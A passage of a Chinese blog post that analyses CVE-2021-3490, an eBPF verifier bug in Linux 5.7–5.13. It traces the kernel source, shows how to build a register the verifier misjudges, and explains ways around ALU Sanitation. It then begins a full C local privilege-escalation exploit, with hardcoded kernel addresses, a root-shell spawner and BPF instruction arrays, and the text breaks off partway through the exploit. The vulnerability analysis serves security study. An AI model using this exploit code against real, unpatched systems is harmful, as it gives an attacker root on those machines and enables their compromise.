本文主要是介绍CVE-2021-3490:ebpf verifier 寄存器32位范围更新错误导致越界读写【ALU Sanitation 绕过】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 前言
- 漏洞分析
- 构造 vuln reg
- 漏洞利用
- ALU Sanitation
- Linux v5.11.8 – 5.11.16 版本
- Linux v5.11.8 之前的版本
- Linux v5.11.16 之后的版本
- exp 及效果演示
- 漏洞修复
- 参考
前言
影响版本:Linux 5.7-rc1 ~ Linux 5.13-rc4
编译选项:开启 CONFIG_BPF_SYSCALL,并在 .config 中启用所有带 BPF 字样的编译选项;
内存分配器按 General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB 选择 SLAB;
CONFIG_E1000 和 CONFIG_E1000E 变更为 =y。
漏洞概述:Linux内核中按位操作(AND、OR 和 XOR)的 eBPF ALU32 边界跟踪没有正确更新 32 位边界,造成 Linux 内核中的越界读取和写入,从而导致任意代码执行。三个漏洞函数分别是 scalar32_min_max_and()
、scalar32_min_max_or()
、scalar32_min_max_xor()
。
测试环境:测试环境 linux-5.11.16
漏洞分析
本文主要以 scalar32_min_max_and
漏洞函数为例进行分析,其它两个漏洞函数的原理完全相同。漏洞函数调用链如下:
bpf_check -> do_check_main -> do_check_common -> do_check -> check_alu_op -> adjust_reg_min_max_vals -> adjust_scalar_min_max_vals -> scalar32_min_max_and
adjust_scalar_min_max_vals
函数如下:
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,struct bpf_insn *insn,struct bpf_reg_state *dst_reg,struct bpf_reg_state src_reg)
{
......case BPF_AND:dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off); scalar32_min_max_and(dst_reg, &src_reg);scalar_min_max_and(dst_reg, &src_reg);break;case BPF_OR:dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);scalar32_min_max_or(dst_reg, &src_reg);scalar_min_max_or(dst_reg, &src_reg);break;case BPF_XOR:dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);scalar32_min_max_xor(dst_reg, &src_reg);scalar_min_max_xor(dst_reg, &src_reg);break;
....../* ALU32 ops are zero extended into 64bit register */if (alu32)zext_32_to_64(dst_reg);__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);return 0;
}
可以看到在执行完相应的 ALU
操作后,会执行 scalar32_min_max_XXX/scalar_min_max_XXX
函数计算 32/64 位边界,其中scalar32_min_max_and
函数如下:
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_subreg_is_const(src_reg->var_off);bool dst_known = tnum_subreg_is_const(dst_reg->var_off);struct tnum var32_off = tnum_subreg(dst_reg->var_off);s32 smin_val = src_reg->s32_min_value;u32 umax_val = src_reg->u32_max_value;// 当 32 位值已知时,直接返回,不作范围调整if (src_known && dst_known)return;dst_reg->u32_min_value = var32_off.value;dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);if (dst_reg->s32_min_value < 0 || smin_val < 0) {dst_reg->s32_min_value = S32_MIN;dst_reg->s32_max_value = S32_MAX;} else {dst_reg->s32_min_value = dst_reg->u32_min_value;dst_reg->s32_max_value = dst_reg->u32_max_value;}}
可以看到在 scalar32_min_max_and
函数,如果两个寄存器的低 32 位值都是 known
的就直接跳过,因为其认为在 64 位中会做相应的调整,scalar_min_max_and
函数如下:
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 1, mask = 0x100000000 }s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002// 当 64 位已知时,进行 mark knownif (src_known && dst_known) {__mark_reg_known(dst_reg, dst_reg->var_off.value);return;}dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 1dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002if (dst_reg->smin_value < 0 || smin_val < 0) {dst_reg->smin_value = S64_MIN;dst_reg->smax_value = S64_MAX;} else {dst_reg->smin_value = dst_reg->umin_value;dst_reg->smax_value = dst_reg->umax_value;}/* We may learn something more from the var_off */__update_reg_bounds(dst_reg);
}
__mark_reg_known
函数的逻辑很简单,就是设置范围为一个常数:
/*
 * Collapse every tracked bound of @reg onto the single constant @imm:
 * var_off, the 64-bit signed/unsigned range and the 32-bit
 * signed/unsigned range.
 */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	reg->var_off = tnum_const(imm);

	/* 64-bit bounds */
	reg->smin_value = (s64)imm;
	reg->smax_value = (s64)imm;
	reg->umin_value = imm;
	reg->umax_value = imm;

	/* 32-bit bounds: the truncated constant */
	reg->s32_min_value = (s32)imm;
	reg->s32_max_value = (s32)imm;
	reg->u32_min_value = (u32)imm;
	reg->u32_max_value = (u32)imm;
}

/*
 * Mark @reg as the known constant @imm.  The bytes between the end of
 * the `type` member and the start of `var_off` are zeroed first.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	u8 *after_type = ((u8 *)reg) + sizeof(reg->type);

	/* Clear id, off, and union(map_ptr, range) */
	memset(after_type, 0,
	       offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
	___mark_reg_known(reg, imm);
}
如果两个寄存器 64 位都是已知的,那么其是不存在问题的,因为在 ___mark_reg_known
函数中更新了 32 位范围。但是 64 位不一定是已知的,即存在一种情况:两个寄存器的低 32 位是已知的,但是其高 32 位不确定。那么此时整个流程就忽略了对 32 位范围的更新。比如如下例子:
R6 = { .value = 1, .mask = 0xffffffff00000000 }
R8 = { .value = 0x100000002, mask = 0 }
我们模拟跟踪下 R6 & R8
执行过程中,寄存器值范围的变化:
case BPF_AND:dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off); scalar32_min_max_and(dst_reg, &src_reg);scalar_min_max_and(dst_reg, &src_reg);break
......__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);
1 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
tnum_and
函数如下:
/*
 * Bitwise AND of two tristate numbers.  The value annotations trace the
 * article's example:
 *   a = R6 = { value = 1,             mask = 0xffffffff00000000 }
 *   b = R8 = { value = 0x1_0000_0002, mask = 0 }
 */
struct tnum tnum_and(struct tnum a, struct tnum b)
{
	u64 alpha, beta, v;

	alpha = a.value | a.mask;	/* alpha = 0xffffffff00000001 */
	beta = b.value | b.mask;	/* beta  = 0x1_0000_0002 */
	v = a.value & b.value;		/* v     = 0 */
	/* result = { value = 0, mask = 0x1_0000_0000 } */
	return TNUM(v, alpha & beta & ~v);
}
两个寄存器的初始状态如下:
R6
:
R8
:
所以执行完 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
后,dst_reg->var_off = { value = 0, mask = 0x100000000 }
,即其只有第 32 位是未知的
2 scalar32_min_max_and(dst_reg, &src_reg);
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_subreg_is_const(src_reg->var_off);bool dst_known = tnum_subreg_is_const(dst_reg->var_off);struct tnum var32_off = tnum_subreg(dst_reg->var_off);s32 smin_val = src_reg->s32_min_value;u32 umax_val = src_reg->u32_max_value;if (src_known && dst_known)return;
......
}
tnum_subreg_is_const
函数就是检查寄存器的低 32 位是否已知:
static inline bool tnum_subreg_is_const(struct tnum a)
{return !(tnum_subreg(a)).mask;
}struct tnum tnum_subreg(struct tnum a)
{return tnum_cast(a, 4);
}struct tnum tnum_cast(struct tnum a, u8 size)
{a.value &= (1ULL << (size * 8)) - 1;a.mask &= (1ULL << (size * 8)) - 1;return a;
}
这里 dst_reg/src_reg
的低 32 位都是已知的,所以会直接返回
3 scalar_min_max_and(dst_reg, &src_reg);
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 0, mask = 0x100000000 }s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002// 这里 dst_reg 是未知的,所以不会执行 __mark_reg_knownif (src_known && dst_known) {__mark_reg_known(dst_reg, dst_reg->var_off.value);return;}dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 0dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002// 这里 dst_reg->smin_value < 0,所以会执行 if 分支if (dst_reg->smin_value < 0 || smin_val < 0) {dst_reg->smin_value = S64_MIN;dst_reg->smax_value = S64_MAX;} else {dst_reg->smin_value = dst_reg->umin_value;dst_reg->smax_value = dst_reg->umax_value;}__update_reg_bounds(dst_reg);
}
在这里 dst_reg->smin_value/smax_value
会被设置为最小值/最大值,然后执行 __update_reg_bounds(dst_reg);
:
/* Refresh the bounds of @reg: the 32-bit ones first, then the 64-bit ones. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
	__update_reg32_bounds(reg);
	__update_reg64_bounds(reg);
}
这里我们主要关注 __update_reg32_bounds(reg);
:
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{struct tnum var32_off = tnum_subreg(reg->var_off);/* min signed is max(sign bit) | min(other bits) */// s32_min_value = max_t(s32, 1, 0) = 1reg->s32_min_value = max_t(s32, reg->s32_min_value,var32_off.value | (var32_off.mask & S32_MIN)); // s32_min_value = 1/* max signed is min(sign bit) | max(other bits) */// s32_max_value = min_t(s32, 1, 0) = 0reg->s32_max_value = min_t(s32, reg->s32_max_value,var32_off.value | (var32_off.mask & S32_MAX)); // s32_max_value = 0reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); // u32_min_value = 1reg->u32_max_value = min(reg->u32_max_value,(u32)(var32_off.value | var32_off.mask)); // u32_max_value = 0
}
由于之前没有更新 32 位范围,所以 dst_reg
之前的 s32_min_value/s32_max_value/u32_min_value/u32_max_value
全都是 1(即 AND 之前低 32 位的常数值),但是经过 AND
操作后,dst_reg
的 var_off
为 { value = 0, mask = 0x100000000 }
,所以在经过 __update_reg32_bounds
处理后,你会发现 s32_min_value = u32_min_value = 1
,而 s32_max_value = u32_max_value = 0
,即寄存器 32 位范围成了 [1, 0]
,这显然是不对的。所以漏洞的本质就是:当寄存器低 32 位已知时,没有更新寄存器低 32 位范围。然后后面 3 个函数暂时先不分析。
所以经过上述操作后,此时 R6
的寄存器状态如下:
这里我们的目的还是去构造一个寄存器 vuln reg
:其验证阶段值为0,实际运行时值为1
构造 vuln reg
这里回忆一下上述构造的 R6
寄存器的状态:
R6:
var_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 0
u32_min_value = 1, u32_max_value = 0
这时我们再构造一个寄存器 R8
,其状态如下:
R8:
var_off = { .value = 0, .mask = 1 }, real_value = 0
s32_min_value = 0, s32_max_value = 1
u32_min_value = 0, u32_max_value = 1
R6+R8
后会执行如下操作:
case BPF_ADD:scalar32_min_max_add(dst_reg, &src_reg);scalar_min_max_add(dst_reg, &src_reg);dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);break;
......__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);
主要我们关注的是 32 位范围,所以看下 scalar32_min_max_add
函数:
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{s32 smin_val = src_reg->s32_min_value;s32 smax_val = src_reg->s32_max_value;u32 umin_val = src_reg->u32_min_value;u32 umax_val = src_reg->u32_max_value;if (signed_add32_overflows(dst_reg->s32_min_value, smin_val) ||signed_add32_overflows(dst_reg->s32_max_value, smax_val)) {dst_reg->s32_min_value = S32_MIN;dst_reg->s32_max_value = S32_MAX;} else {dst_reg->s32_min_value += smin_val;dst_reg->s32_max_value += smax_val;}if (dst_reg->u32_min_value + umin_val < umin_val ||dst_reg->u32_max_value + umax_val < umax_val) {dst_reg->u32_min_value = 0;dst_reg->u32_max_value = U32_MAX;} else {dst_reg->u32_min_value += umin_val;dst_reg->u32_max_value += umax_val;}
}
这里是不存在溢出的,所以会将对应的范围边界值相加,所以相加后其 R6
状态如下:
R6:
var_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后执行 dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
:
/*
 * Addition of two tristate numbers.  The value annotations trace the
 * article's example:
 *   a = { value = 0, mask = 0x1_0000_0000 }
 *   b = { value = 0, mask = 1 }
 */
struct tnum tnum_add(struct tnum a, struct tnum b)
{
	u64 sm, sv, sigma, chi, mu;

	sm = a.mask + b.mask;		/* sm    = 0x1_0000_0001 */
	sv = a.value + b.value;		/* sv    = 0 */
	sigma = sm + sv;		/* sigma = 0x1_0000_0001 */
	chi = sigma ^ sv;		/* chi   = 0x1_0000_0001 */
	mu = chi | a.mask | b.mask;	/* mu    = 0x1_0000_0001 */
	/* result = { value = 0, mask = 0x1_0000_0001 } */
	return TNUM(sv & ~mu, mu);
}
所以执行完 tnum_add
后 R6
的状态为:
R6:
var_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后 __update_reg_bounds(dst_reg);/__reg_deduce_bounds(dst_reg);
并不会对 R6
的状态产生影响,这里读者感兴趣可以自行分析一下,比较简单。主要是 __reg_bound_offset(dst_reg);
,其会将范围反馈到寄存器的值,函数定义如下:
/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{struct tnum var64_off = tnum_intersect(reg->var_off, tnum_range(reg->umin_value, reg->umax_value));struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),tnum_range(reg->u32_min_value,reg->u32_max_value)); reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
这里我还是只关注 32 位范围,记住此时 R6
的状态:
R6:
var_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
我们将 struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value));
进行拆分:
tnum_range
函数定义如下:这里传入的 min = max = 1
/*
 * Build a tristate number covering the range [@min, @max].  The value
 * annotations trace the article's call with min = max = 1.
 */
struct tnum tnum_range(u64 min, u64 max)
{
	u64 chi = min ^ max, delta;	/* chi  = 0 */
	u8 bits = fls64(chi);		/* bits = 0 */

	/* special case, needed because 1ULL << 64 is undefined */
	if (bits > 63)
		return tnum_unknown;
	delta = (1ULL << bits) - 1;	/* delta = 0 */
	/* result = { value = 1, mask = 0 } */
	return TNUM(min & ~delta, delta);
}
所以这里 tnum_range(reg->u32_min_value, reg->u32_max_value) = { value = 1, mask = 0 }
tnum_subreg(reg->var_off)
就不多说了,取低 32 位,所以返回的是 { value = 0, mask = 1 }
所以最后就是:struct tnum var32_off = tnum_intersect({ value = 1, mask = 0 }, { value = 0, mask = 1 });
(tnum_intersect 对两个参数是对称的,参数的先后顺序不影响结果):
/*
 * Combine what two tristate numbers know about the same value: a bit is
 * unknown in the result only if it is unknown in both inputs.  The value
 * annotations trace the article's example:
 *   a = { value = 1, mask = 0 }, b = { value = 0, mask = 1 }
 */
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;	/* v  = 1 */
	mu = a.mask & b.mask;	/* mu = 0 */
	/* result = { value = 1, mask = 0 } */
	return TNUM(v & ~mu, mu);
}
所以最后 R6
寄存器的状态为:
R6:
var_off = { .value = 1, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
所以可以看到最后在验证阶段,R6
的低 32 位被当作了常数1(当然这里构造了 32 位,自然就构造了 64 位,比如我们只需要 AND 1
即可),但是注意 R6/R8
在实际运行时都是0,所以 R6+R8
应当是0,所以实际运行时最后 R6
应当是0(自然低 32 位应当是0)。
所以经过上述步骤,我们成功的构造了一个在验证阶段为 1
,而在实际运行时为 0
的寄存器 R6
。但是我们需要的是在验证阶段为 0
,而在实际运行时为 1
的寄存器,所以这里似乎反了。但是解决方案比较简单,我们可以先将 R6 + 1
,这样就构造了一个验证阶段为 2
,实际运行为 1
的寄存器 R6
,然后再 AND 1
,这样就成功的构造了一个验证阶段为 0
,实际运行为 1
的寄存器 R6
了
漏洞利用
构造好了验证阶段为 0
,实际运行为 1
的寄存器之后,其利用就比较常规了。但是这里需要注意 ALU Sanitation
机制。
ALU Sanitation
ALU Sanitation
是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier
静态分析的不足。这项技术由 fixup_bpf_calls()
实现:它并不是给 eBPF
程序中的每一条指令都打补丁,而是只在被 verifier 标记过的指针算术指令(即下文代码中的 BPF_ALU64 | BPF_ADD/BPF_SUB | BPF_X)前面插入额外的辅助指令。
Linux v5.11.8 – 5.11.16 版本
对于 BPF_ADD
及 BPF_SUB
这样的指令而言,会添加如下辅助指令【linux-5.11.16】:
static int fixup_bpf_calls(struct bpf_verifier_env *env)
{
......for (i = 0; i < insn_cnt; i++, insn++) {......if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;struct bpf_insn insn_buf[16];struct bpf_insn *patch = &insn_buf[0];bool issrc, isneg;u32 off_reg;aux = &env->insn_aux_data[i + delta];if (!aux->alu_state ||aux->alu_state == BPF_ALU_NON_POINTER)continue;isneg = aux->alu_state & BPF_ALU_NEG_VALUE;issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==BPF_ALU_SANITIZE_SRC;off_reg = issrc ? insn->src_reg : insn->dst_reg;if (isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);if (issrc) {*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,off_reg);insn->src_reg = BPF_REG_AX;} else {*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,BPF_REG_AX);}if (isneg)insn->code = insn->code == code_add ?code_sub : code_add;*patch++ = *insn;if (issrc && isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);cnt = patch - insn_buf;new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);if (!new_prog)return -ENOMEM;delta += cnt - 1;env->prog = prog = new_prog;insn = new_prog->insnsi + i + delta;continue;}......return 0;
}
其中 aux->alu_limit
为当前指针运算范围,初始时为 0,与指针所做的常量运算同步,对于减法而言可读范围为 (ptr - alu_limit, ptr]
(以指针最初指向的地址为 0),因此我们还需要绕过这个检查
由于我们有运行时为 1,verifier
认为是 0 的寄存器,我们可以这样调整范围:
- 构造另外一个同样是运行时值为 1、
verifier
认为是 0 的寄存器R8
- 将
R8
乘上一个不大于value size
的值(例如value size
为 0x1000,R8
便设为 0x1000) - 将指向
map
第一个元素第一个字节value[0]
的寄存器(假设为R7
)先加上 0x1000,此时alu_limit
变为 0x1000,R7
指向value[0x1000]
R7 -= R8
,由于verifier
认为R8
为 0,因此alu_limit
保持不变,但R7
实际上已经指回了value[0]
即通过如下指令即可绕过:
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
Linux v5.11.8 之前的版本
在内核版本 5.11.8
之前 ALU Sanitation
存在一个漏洞,即 aux_alu_limit
被初始化为 0 从而导致 0-1
造成整型溢出变为一个巨大的值,在这个 commit 中才被修复,因此对于 5.11.8
之前版本的内核而言是不需要绕过该检查的
static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,u32 *ptr_limit, u8 opcode, bool off_is_neg)
{bool mask_to_left = (opcode == BPF_ADD && off_is_neg) ||(opcode == BPF_SUB && !off_is_neg);u32 off;switch (ptr_reg->type) {case PTR_TO_STACK:/* Indirect variable offset stack access is prohibited in* unprivileged mode so it's not handled here.*/off = ptr_reg->off + ptr_reg->var_off.value;if (mask_to_left)*ptr_limit = MAX_BPF_STACK + off;else*ptr_limit = -off;return 0;case PTR_TO_MAP_VALUE:if (mask_to_left) {*ptr_limit = ptr_reg->umax_value + ptr_reg->off;} else {off = ptr_reg->smin_value + ptr_reg->off;*ptr_limit = ptr_reg->map_ptr->value_size - off;}return 0;default:return -EINVAL;}
}......
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;struct bpf_insn insn_buf[16];struct bpf_insn *patch = &insn_buf[0];bool issrc, isneg;u32 off_reg;aux = &env->insn_aux_data[i + delta];if (!aux->alu_state ||aux->alu_state == BPF_ALU_NON_POINTER)continue;isneg = aux->alu_state & BPF_ALU_NEG_VALUE;issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==BPF_ALU_SANITIZE_SRC;off_reg = issrc ? insn->src_reg : insn->dst_reg;if (isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);......
Linux v5.11.16 之后的版本
目前最新的 ALU Sanitation
保护机制。2021年4月 ALU Sanitation
引入新的 patch—commit 7fedb63a8307,新增了两个特性。
- 一是
alu_limit
计算方法变了,不再用指针寄存器的位置来计算,而是使用offset
寄存器。例如,假设有个寄存器的无符号边界是umax_value = 1, umin_value = 0
,则计算出alu_limit = 1
,表示如果该寄存器在运行时超出边界,则指针运算不会使用该寄存器。 - 二是在
runtime
时会用立即数替换掉verifier
认定为常数的寄存器。例如,BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
,EXPLOIT_REG
被verifier
认定为0,但运行时为1,则将该指令改为BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
。这个补丁本来是为了防侧信道攻击,同时也阻止了CVE-2021-3490
漏洞的利用。
以下补丁可看出,如果不确定offset寄存器是否为常量,则根据其alu_limit进行检查;如果确定其为常量,则用其常量值将其操作patch为立即数指令。
bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);} else {// Patch alu_limit check instructions....}
这两个新特性的引入使得本文所用的攻击方法近乎完全失效,不过这并不代表我们不能完成利用,在 D^3CTF2022-d3bpf-v2 中来自 vidar-team 的 chuj 师傅展示了一个新的技巧——由于 bpf_skb_load_bytes()
会将一个 sk_buff
的数据读到栈上,因此我们可以利用运行时为 1、verifier 确信为 0 的寄存器构造一个较长的 len
参数,从而使得数据拷贝时发生栈溢出
我们或许还需要额外的办法泄露内核地址,一个可行的方式是直接造成 kernel oops
后通过 dmesg
泄露出内核信息,这个技巧对于总会设置 oops=panic
的 CTF 题并不可用,但是大部分的真实世界环境其实都不会在 soft panic 发生时直接 panic (/proc/sys/kernel/panic_on_oops == 0
),因此这个方法的可行性其实还是挺高的
exp 及效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(2);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf(" %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");}printf(" ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* root checker and shell poper */
void get_root_shell(void)
{if(getuid()) {puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");sleep(2);exit(EXIT_FAILURE);}puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");system("/bin/sh");/* to exit the process normally, instead of segmentation fault */exit(EXIT_SUCCESS);
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}static inline int bpf(int cmd, union bpf_attr *attr)
{return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,unsigned int value_size, unsigned int max_entries)
{union bpf_attr attr = {.map_type = map_type,.key_size = key_size,.value_size = value_size,.max_entries = max_entries,};return bpf(BPF_MAP_CREATE, &attr);
}static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,};return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,.flags = flags,};return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,};return bpf(BPF_MAP_DELETE_ELEM, &attr);
}static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.next_key = (uint64_t)next_key,};return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{struct bpf_map_info info;union bpf_attr attr = {.info.bpf_fd = map_fd,.info.info_len = sizeof(info),.info.info = (uint64_t)&info,};bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);return info.btf_id;
}int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff82b0d040;
uint64_t init_cred = 0xffffffff8398fca0;
uint64_t init_task = 0xffffffff83824a80;
uint64_t init_nsproxy = 0xffffffff8398e9c0;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;struct bpf_insn prog[] = {BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptrBPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] = 0BPF_MOV64_IMM(BPF_REG_8, 